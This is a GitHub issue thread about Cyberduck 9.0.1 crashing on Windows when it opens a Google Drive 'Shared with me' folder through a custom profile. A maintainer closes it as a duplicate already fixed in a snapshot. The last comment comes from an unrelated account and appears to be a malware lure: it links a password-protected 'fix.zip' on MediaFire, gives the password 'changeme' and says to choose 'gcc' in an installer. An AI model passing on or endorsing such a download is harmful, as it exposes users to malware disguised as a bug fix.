### ISSUE TITLE
Crashed opening google drive folder using customized profile.

### ISSUE THREAD

**Issue by FHRayS** [iterate-ch/cyberduck#16266] opened 2024-08-28 10:11 UTC
Crashed when open google drive "shared with me" folder using customized profile due to the "the app is blocked" issue, followed the official guide.

**To Reproduce**
1. Double click the .cyberduckprofile file and create a new profile
2. Open the "shared with me folder"
3. Crash

**Desktop:**
 - OS: Win11 23H2 Enterprise
 - Version 9.0.1

**Log Files**
[638604645251512311.txt](https://github.com/user-attachments/files/16781846/638604645251512311.txt)

**Comment by AliveDevil** [comment] 2024-08-28 10:27
Please update to the latest snapshot release, where this is already fixed, or rename all bad files in Google Drive - though, you may not have the permission to rename files in "Shared With Me".

Duplicate of #16174.

**Closed by AliveDevil** 2024-08-28 10:27 UTC
Labels: bug, interface

**Comment by HTneko** [comment] 2024-08-28 10:31
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
